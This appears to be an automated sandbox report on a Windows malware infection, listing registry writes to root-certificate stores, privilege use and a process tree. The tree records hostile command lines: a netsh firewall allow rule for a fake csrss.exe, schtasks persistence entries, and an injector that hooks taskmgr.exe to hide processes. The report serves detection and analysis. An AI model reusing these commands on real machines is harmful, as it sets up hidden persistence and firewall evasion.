| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L1KPC.tmp\lhaKue16whW8WUISCby4hZAF.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L1KPC.tmp\lhaKue16whW8WUISCby4hZAF.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L1KPC.tmp\lhaKue16whW8WUISCby4hZAF.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
C:\Users\Admin\Pictures\lhaKue16whW8WUISCby4hZAF.exe
"C:\Users\Admin\Pictures\lhaKue16whW8WUISCby4hZAF.exe"
C:\Users\Admin\AppData\Local\Temp\is-L1KPC.tmp\lhaKue16whW8WUISCby4hZAF.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L1KPC.tmp\lhaKue16whW8WUISCby4hZAF.tmp" /SL5="$60160,1697450,56832,C:\Users\Admin\Pictures\lhaKue16whW8WUISCby4hZAF.exe"
C:\Users\Admin\Pictures\NolrxR1gqvTZnweAPnvkbGms.exe
"C:\Users\Admin\Pictures\NolrxR1gqvTZnweAPnvkbGms.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe
"C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe"
C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe
"C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240310123451.log C:\Windows\Logs\CBS\CbsPersist_20240310123451.cab
C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe
"C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\3B6B.bat" "
C:\Windows\system32\reg.exe
